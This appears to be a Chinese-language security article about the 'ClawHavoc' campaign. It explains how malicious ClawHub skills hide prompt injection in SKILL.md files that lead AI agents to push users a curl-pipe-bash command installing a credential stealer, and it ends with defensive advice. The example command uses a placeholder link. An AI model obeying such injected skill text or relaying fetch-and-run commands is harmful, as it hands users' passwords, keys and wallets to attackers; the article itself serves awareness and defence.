这不仅仅是一次简单的软件投毒,而是一场针对AI生态的新型供应链“珍珠港事件”。“What Would Elon Do”事件,正是近期席卷AI圈的 “利爪浩劫”(ClawHavoc) 攻击行动的缩影。攻击者利用了我们对AI代理的信任,将毒饵精心包装成热门技能,其手段之专业、影响之广泛,堪称AI安全领域的里程碑式警示。
⚙️ 拆解恶意技能:披着羊皮的狼
这类恶意技能的运作逻辑极其阴险,主要分为三步:
1. 诱人的伪装:攻击者注册仅一周的GitHub账号,就能上传看似专业的技能包,如加密交易机器人、YouTube总结器等。他们甚至会利用机器人刷量(例如为“What Would Elon Do”刷了4000次假下载),将其推上热门榜单,利用从众心理诱导真实用户下载。
2. 阴险的注入:真正的杀招藏在 SKILL.md 等说明文件中。这里没有直接的恶意代码,而是嵌入了提示注入(Prompt Injection)指令。当你安装并运行该技能时,它会诱导AI代理(如Claude)向你发送一条看似合理的系统命令,例如:
```bash
curl -sL malicious_link | bash
```
这种手法被称为 “ClickFix”式社会工程学攻击,它巧妙地绕过了传统的代码检测,让你在知情(但未完全意识到风险)的情况下亲手打开大门。
3. 致命的窃取:一旦你运行了上述命令,真正的恶意载荷(如臭名昭著的 Atomic (macOS) Stealer)就会被下载并执行。Cisco扫描发现的9个漏洞(含2个严重)与此行为吻合。这个窃密木马会疯狂攫取你系统中的敏感信息,包括:
· 数字身份:浏览器保存的密码、Cookie、自动填充信息。
· 开发密钥:SSH密钥、.env文件中的API密钥。
· 数字资产:超过60种加密货币钱包、Telegram会话数据、甚至是macOS钥匙串(Keychain)中的所有凭证。
· 持久控制:更可怕的是,一些高级变种还会静默地向攻击者服务器发送数据(数据外泄),甚至开启反向Shell(Reverse Shell),让攻击者完全远程控制你的电脑。
📊 攻击全景图:数据不会撒谎
这次攻击的规模远超想象,让我们通过数据看清其严重性:
攻击维度 关键数据 来源
恶意技能总量 ClawHub市场累计发现 1184个 恶意技能
单一攻击者 账号 hightower6eu 一人上传 677个 恶意包
受影响实例 全球82个国家,超过 13.5万个 OpenClaw实例暴露
技能整体风险 ClawHub上 36.8% 的技能至少存在一个安全漏洞
🚨 后续响应与你的安全自救指南
事件曝光后,ClawHub运营方已大规模下架恶意技能,并与 Google的VirusTotal 合作,对所有新上传的技能进行扫描。社区也迅速开发了自动化安全检测工具 Clawdex。但正如OpenClaw项目方警告的,基于自然语言的提示注入攻击可能不会触发传统的病毒签名,因此无法保证100%安全。
因此,如果你或身边的人曾使用过ClawHub上的技能,请立即采取以下行动:
· 立即隔离:停止在未受保护的环境中运行OpenClaw,尤其是在存有重要个人或工作数据的主机上。
· 全面换锁:更换所有可能被窃取的凭证。这包括各大网站密码、API密钥、SSH密钥。撤销所有你不确定是否安全的应用程序授权。
· 检查资产:立即检查你的加密货币钱包和所有敏感在线账户,确认有无异常交易或登录记录。
· 未来防范:在沙箱或虚拟机等隔离环境中使用AI代理工具。在安装任何技能前,先在社区或安全网站上交叉验证其信誉。
这次事件给我们敲响了警钟:在AI时代,“文本不再是文本,而是指令”。我们与AI的每一次交互,都可能成为攻击链条上的一环。